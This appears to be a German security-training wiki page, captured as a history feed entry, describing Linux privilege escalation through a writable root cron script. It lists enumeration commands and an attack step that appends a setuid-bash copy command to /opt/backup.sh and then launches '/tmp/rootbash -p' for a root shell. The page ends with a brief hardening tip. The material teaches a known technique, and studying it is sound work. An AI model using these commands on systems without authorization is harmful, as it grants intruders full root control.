https://wiki.ixheim.de/index.php?action=history&feed=atom&title=Privilege_Escalation_%C3%BCber_falsch_konfigurierten_Cronjob 2026-06-17T22:56:26Z Versionsgeschichte dieser Seite in Xinux Wiki MediaWiki 1.35.1 https://wiki.ixheim.de/index.php?title=Privilege_Escalation_%C3%BCber_falsch_konfigurierten_Cronjob&diff=69812&oldid=prev 2026-05-08T13:56:34Z

<p>Die Seite wurde neu angelegt: „===Zielsetzung=== *Root-Rechte durch unsichere Cronjob-Konfiguration erlangen. ===Wie entdeckt man die Schwachstelle?=== ;Benutzer-Cronjobs prüfen *crontab -…“</p> <p><b>Neue Seite</b></p><div>===Zielsetzung===<br /> *Root-Rechte durch unsichere Cronjob-Konfiguration erlangen.<br /> <br /> ===Wie entdeckt man die Schwachstelle?===<br /> ;Benutzer-Cronjobs prüfen<br /> *crontab -l<br /> <br /> ;Systemweite Cronjobs prüfen<br /> *cat /etc/crontab<br /> *ls -la /etc/cron.d/<br /> *ls -la /etc/cron.hourly/<br /> *ls -la /etc/cron.daily/<br /> *ls -la /etc/cron.weekly/<br /> *ls -la /etc/cron.monthly/<br /> <br /> ;Dateiberechtigungen prüfen<br /> *ls -l /pfad/zum/skript.sh<br /> <br /> ;Verdächtig<br /> *Skripte, die von normalen Benutzern bearbeitet werden können und als root ausgeführt werden.<br /> <br /> ===Voraussetzungen===<br /> {| class=&quot;wikitable&quot;<br /> ! Bedingung !! Beschreibung<br /> |-<br /> | Schwacher Cronjob || Existiert<br /> |-<br /> | Lokaler Zugriff || Vorhanden<br /> |-<br /> | shell Zugriff || Vorhanden<br /> |}<br /> <br /> ===Angriff: Code einschleusen===<br /> ;Skript manipulieren<br /> *echo &quot;cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash&quot; &gt;&gt; /opt/backup.sh<br /> <br /> ;Warten, bis Cronjob ausgeführt wird.<br /> <br /> ;Root-Shell starten<br /> */tmp/rootbash -p<br /> <br /> ;Erwartung<br /> *Root-Shell erhalten.<br /> <br /> ===Hinweise===<br /> *Dateien, die von root ausgeführt werden, müssen sicher konfiguriert sein (nur root schreibbar).</div>

Thomas.will